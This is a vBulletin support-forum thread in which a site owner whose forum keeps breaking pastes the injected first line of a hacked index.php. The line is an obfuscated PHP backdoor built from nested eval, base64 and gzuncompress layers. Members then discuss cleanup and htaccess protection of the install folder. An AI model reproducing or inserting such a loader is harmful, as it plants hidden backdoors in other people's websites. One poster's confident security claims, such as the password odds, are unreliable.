New Error i never see in vb4 error

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Sempoi
    New Member
    • Jan 2012
    • 26
    • 4.2.X

    [Forum] New Error i never see in vb4 error

    i got this error this afternoon yesterdays..

    try to disable global mod - nothing happen

    so i redownload new vb file and replace all of that. so try to refresh, site is live without no problem on that..

    but this after the error come out again.

    the error is :
    PHP Code:
    Fatal errorCannot redeclare fi() (previously declared in /home/XXXXXX/public_html/index.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home/XXXXXX/public_html/forum/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 
    i try to open the index.php i see the line 1 and got something i never see it.

    this the line i in index.php

    PHP Code:
    <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d01WVmpSVXQzYWtGTkwxSlZVRkZvVjBkUWVVRmxOWE5YVERSTlIycFRRbXhrTTBGd01VeFdhMGc0S3psME1HMDNaRUpET1VvcmNFd3pXSFJ3ZFV3NVptSjFZbnBsU0RCTEszUkNWRkJWTkd4WlpsaGFRMmxqTVVKRVFsUlJWVXBUTmpBMVV6bExRVkpzVGxOQmJFbDViakpHVFVKaVVqRXlWbGRNU1VoVU1WWkZSVGhrU1VkSWJGazRVMUpIZG1wTE1taDNSRUUyUm1sVllWUlZhbFpKTjA4eVNuQmFhRU5DWVd4QmFrOXZkR1JrUlRWQlYzRm9jSGN6YVZBMFpIVlVXWE42ZG1wbGNYRk1UMEpLVUVGWFdFVm9OSEJTZWtOM09Ya3JWMXB5VDBkVVlYVTFiakZsVTBnMll6VXZiVXhRY1hJd0wyRmlTMFV6ZFZVclMwUnhTR2hXTTNSWVVFMUZMekZaV20xaFJrUmFlVWhqTVRBeFZ6Y3liVkJzYzJSb09EbFNXaTlpYWxKMGR6ZzRaRVF2ZG1wR2VsSldibG8wUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XbzVSazk0UTBGUlVsZzViRkY0Y21KdFoySmxNMWQzWVhZd1RqaEhRM0ZHWTFOdVZVdGlaMU0wTnpnM01WY3dlWGxVTTJONlNqQmFOV2hMYm1wRGJXVmFkWGRoTjB3NFluVkVkMVJSWlRKRmVqTnNPVlYxY0VSdmNuZzFhMEZIVlVkT2NuRTNaWGx5U2xRck15OU5hV1Z4TVhwbVF6VmFNa1ZDVmpoVGJVbFJRbkZPYWtsV2FFMXpUVlJyYTNSMk9XZEtPVmRVYld4b2FFUldVbHB2TTI5R2JVTTVWMUZOYURjeVUzTkxNVVpUV1dSNGVUSlRaVlZPWTFZM2VrZERWMjlVU210cVRGWlJkVTUxY1ZGdWVYcFlOWEJxSzI4NE0wTjZValZRV0dKNVkyVjZNVkY1UWpsVldIVm1VemhyUm5FclZ5OXlNMmxEU0hKbU9WZ3lTM0F5ZDNKVVkyUTNUV0ZHU3paSWRHVnRXVGxOUldzM1pYTkhSR3R5SzJwUVdsaERhV1ZIYm1od09GQllPRGgzZEdWWU1qTkhKeWtwS1RzZ1B6NDhQeUJsZG1Gc0tHZDZkVzVqYjIxd2NtVnpjeWhpWVhObE5qUmZaR1ZqYjJSbEtDZGxUbkE1YXprNVRIZDZRVkZuVUN0V1QxRndUSE5GYW5VeWJsTnlXWGM0VkRadWQxbExkRE13Y0ZsUmFUWnhRWFpMTkhkS2QzUnFMMkp1TjI5a2JYTmhTREJ5VXpOdVpETjVaR05yTW5VeGNrMWtjekJVVUVKd2NFOWpkMmw0WWt4d04zWTFZMnhYVGpack1WUnFNVkZzUms1UGVEZHNaRkY2VUVsNFEwTkZkMDV1VUZKbkswVktlVE5PU1RSc016ZDBaakZuTkd4eVkxTlFUbmN4ZUZRNWNITnNkbGhyTDBvNVFucFRVU3RNYmxOeldEQm9iMFJpVW1WSGNHaFpSM0k0ZDB0M0t6TkJWa3R3YWxwbmJtaFNUVXhyYzJGS1N6ZGhWMUJHTDNGSmRVb3ZWa3hVTkhwalduTlBkV0pLZDJaNlEwSnVWV0l3Y1hsMFpXbHlRamRYTml0bE5reFBOa3h6YVdwa09ISktUemhGVnk4eFVFNUdPR0pvVjNCdk4xaEpTR1V5V2t0NE0ydElSR1UzWjJJcmNuaFRSVk5SVFUxRlJWbEhSME5TVFVadFFWTjNiM2RFVkVWeFdWTlpRMUpvVFd0RVZFVlpXVVZCUm05VVEwVkpVVUpOUzFsUlEybHhhVWhuUjNGc2NrTk5hRWRqUTJSWmRXaE5iaXQ1UmpCVlVGbDJVa2hXUkhkRVpGTXplRUZSYW14Uk5HRlBVRGhaU1N0MGVERkljR0ZMV0ROUlJsRTJaMmx1YlUwNWNqVmpUbTByZGlzeVltUnVjemR6VEdSMGVVdGxaak00TVdWWU5XNXFPR1puUkZkV1ZtRmFkejA5SnlrcEtUcz0iKSk7DQo="));

    sorry for the bad english language

    i hope someone can solve my problem
    and tell is this problem come from VB file or Server problem.

    thanks
  • donald1234
    Senior Member
    • Oct 2011
    • 1953
    • 4.1.x

    #2
    See this thread, starting to look like this is a new exploit.

    Comment

    • Sempoi
      New Member
      • Jan 2012
      • 26
      • 4.2.X

      #3
      Originally posted by donald1234
      See this thread, starting to look like this is a new exploit.

      http://www.vbulletin.com/forum/forum...how-white-page
      so how can i fix this issue

      its already happen to me for 2 day,
      every time this happen i need to replace fresh copy of vbulletin ?

      Comment

      • donald1234
        Senior Member
        • Oct 2011
        • 1953
        • 4.1.x

        #4
        The cure appears to be uploading fresh files and deleting any plug ins that you don't recognise. The cause is what we are still waiting to hear about.

        Comment

        • Ion Saliu
          Senior Member
          • Sep 2010
          • 172
          • 4.2.X

          #5
          Axiomatic Colleague of Mine:

          An experience like yours was my first run-in with vBulletin. That is the base64 infection. It happened to me during the first upgrading operation to my forum.

          If you have many foes, as I do, the skumbullows (cyber criminals) can’t wait for an upgrade! I always close my forum — and an announcement informs the visitors that the forum is in a maintenance process. The skumbullows immediately attacked the /install/upgrade.php script! They infected my forum with that dreadful base64 infection!

          I can still see in my webstats daily requests for the /install/upgrade.php script. They can’t wait to attack me again! The Vbeer support guys here say not to tell this kind of facts. But, hey, the skumbullows don’t need to hear the “tip” from me! They have known this vulnerability for many years…

          These are the facts of life — vulnerability inherent to scripts and upgrading by typing an address in the browser address box! The scripts are simply text files, easy to read files. Windows servers, on the other hand, are run by executables (EXE) files, which are far harder to read.

          In my case, axiomatic one, I was lucky with an understanding webhost. The tech support removed the base64 infection for me. But, I heard from them for the first time, that vBulletin forums were not recommended. My webhost also warned me that they would not tolerate a repeat of the incident. They would cancel my account, unfortunately. No wonder I am extremely reluctant to upgrade my vB forum… daily requests for the /install/upgrade.php script…

          Best of luck and holiday wishes to you all, brothers and sisters in forum administration!

          Ion Saliu
          Wishful Thinker At-Large
          “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”

          Comment

          • BirdOPrey5
            Senior Member
            • Jul 2008
            • 9613
            • 5.6.3

            #6
            Originally posted by Ion Saliu
            Axiomatic Colleague of Mine:

            An experience like yours was my first run-in with vBulletin. That is the base64 infection. It happened to me during the first upgrading operation to my forum.

            If you have many foes, as I do, the skumbullows (cyber criminals) can’t wait for an upgrade! I always close my forum — and an announcement informs the visitors that the forum is in a maintenance process. The skumbullows immediately attacked the /install/upgrade.php script! They infected my forum with that dreadful base64 infection!

            I can still see in my webstats daily requests for the /install/upgrade.php script. They can’t wait to attack me again! The Vbeer support guys here say not to tell this kind of facts. But, hey, the skumbullows don’t need to hear the “tip” from me! They have known this vulnerability for many years…

            These are the facts of life — vulnerability inherent to scripts and upgrading by typing an address in the browser address box! The scripts are simply text files, easy to read files. Windows servers, on the other hand, are run by executables (EXE) files, which are far harder to read.

            In my case, axiomatic one, I was lucky with an understanding webhost. The tech support removed the base64 infection for me. But, I heard from them for the first time, that vBulletin forums were not recommended. My webhost also warned me that they would not tolerate a repeat of the incident. They would cancel my account, unfortunately. No wonder I am extremely reluctant to upgrade my vB forum… daily requests for the /install/upgrade.php script…

            Best of luck and holiday wishes to you all, brothers and sisters in forum administration!

            Ion Saliu
            Wishful Thinker At-Large
            “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”
            You can password protect or IP protect your ./install/ directory before uploading the files to it so only you can access the folder- this will prevent people from exploiting the files even during the few minutes the files may need to be on the server.

            Comment

            • Ion Saliu
              Senior Member
              • Sep 2010
              • 172
              • 4.2.X

              #7
              You can password protect or IP protect your ./install/ directory before uploading the files to it so only you can access the folder- this will prevent people from exploiting the files even during the few minutes the files may need to be on the server.
              Joe, I don’t think it works, axiomatic colleague of mine. What happens when I type …/upgrade.php in the browser? The /install folder is .htaccess protected. I try, for example:

              The custom error page at Web site is related to HTTP errors 404, 403, Not Found, Forbidden, Access Denied. It offers helpful advice to find what's missing.


              Nothing happens, as the /includes folder is .htaccess protected.

              Comment

              • BirdOPrey5
                Senior Member
                • Jul 2008
                • 9613
                • 5.6.3

                #8
                You would need to know the username/password that is set to protect the install folder...

                If you go to
                Code:
                http://domain.com/install/upgrade.php
                and it is htaccess password protected you will be asked to enter the username/password to continue. Once you enter it you don't have to worry about it again for this session and can upgrade or install as normal. If you choose a difficult password it will take other people days, weeks, if ever to break in.

                As for the /includes/ folder there is no time you will EVER have to browse to a file in the includes folder so you can just set a super long password and never worry about it- you don't need to remember it because you'll never need to browse to your config.php file via a browser- it is useless to do so.

                Comment

                • Ion Saliu
                  Senior Member
                  • Sep 2010
                  • 172
                  • 4.2.X

                  #9
                  You would need to know the username/password that is set to protect the install folder...
                  Correct, axiomatic one! That’s what happens when trying to access my AdminCP by typing the address in the browser (http://forums.saliu.com/admincp/).

                  Well, then, looks like this /install debacle is solved! Just .htaccess-protect the folder with a username and password. Don’t even need to delete the folder, as we don’t need to delete the /admincp folder.

                  Have a /install folder "secretly" on the server. Go to your webhost AdminCP and password protect the /install folder as per my poste here:


                  It is clear now that the vBulletin Team cannot create fill-in .htaccess files. The passwords must be encrypted by the server. And the webhost AdminCP needs to have a folder on the server in order to password-protect it.

                  I wonder what happens if I copy the file from any .htaccess-protected folder on the server to the /install folder on my PC — and then upload the vB upgrade package? For example, I have a strong .htaccess file in my AdminCP folder. That way, the /install folder is never vulnerable, not for one second…

                  By the way, strong passwords (as those generated in LastPass) are unbreakable for all intents and purposes. The webserver allows only 3 to 5 tries to enter the password. Nobody can guess a password in 3 to 5 tries… the odds are 1 in a trillion!

                  Best holiday wishes to you all, brothers and sisters in forum/software creation!

                  Ion Saliu
                  Wishful Thinker At-Large
                  “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”

                  Comment

                  • BirdOPrey5
                    Senior Member
                    • Jul 2008
                    • 9613
                    • 5.6.3

                    #10
                    Originally posted by Ion Saliu

                    Correct, axiomatic one!
                    I'm not sure if this is just a language barrier or such but I would prefer you not call me the "axiomatic one" I am most certainly fallible.

                    Comment

                    • Sempoi
                      New Member
                      • Jan 2012
                      • 26
                      • 4.2.X

                      #11
                      today already 10 time reupload vbfiles to server
                      this problem never solve

                      please man to stop this problem ?

                      Comment

                      • David Copeland
                        Senior Member
                        • May 2000
                        • 1354
                        • 4.2.5

                        #12
                        Originally posted by Sempoi
                        today already 10 time reupload vbfiles to server
                        this problem never solve

                        please man to stop this problem ?
                        We have the same problem, with no solution

                        David

                        DAVID COPELAND
                        Licensed VB Holder Since 2000
                        Celebrating 22 Years with VB

                        Comment

                        • Sempoi
                          New Member
                          • Jan 2012
                          • 26
                          • 4.2.X

                          #13
                          hye

                          i am asking how to fix this problem!!!
                          i am so tired very time i need to reupload the fresh file

                          Sempoi

                          Comment

                          • donald1234
                            Senior Member
                            • Oct 2011
                            • 1953
                            • 4.1.x

                            #14
                            You need to find where the backdoor is that the attacker is using to alter your files. have you tried disabling your plugins?

                            Comment

                            • Sempoi
                              New Member
                              • Jan 2012
                              • 26
                              • 4.2.X

                              #15
                              Originally posted by donald1234
                              You need to find where the backdoor is that the attacker is using to alter your files. have you tried disabling your plugins?
                              yes i already try it....

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...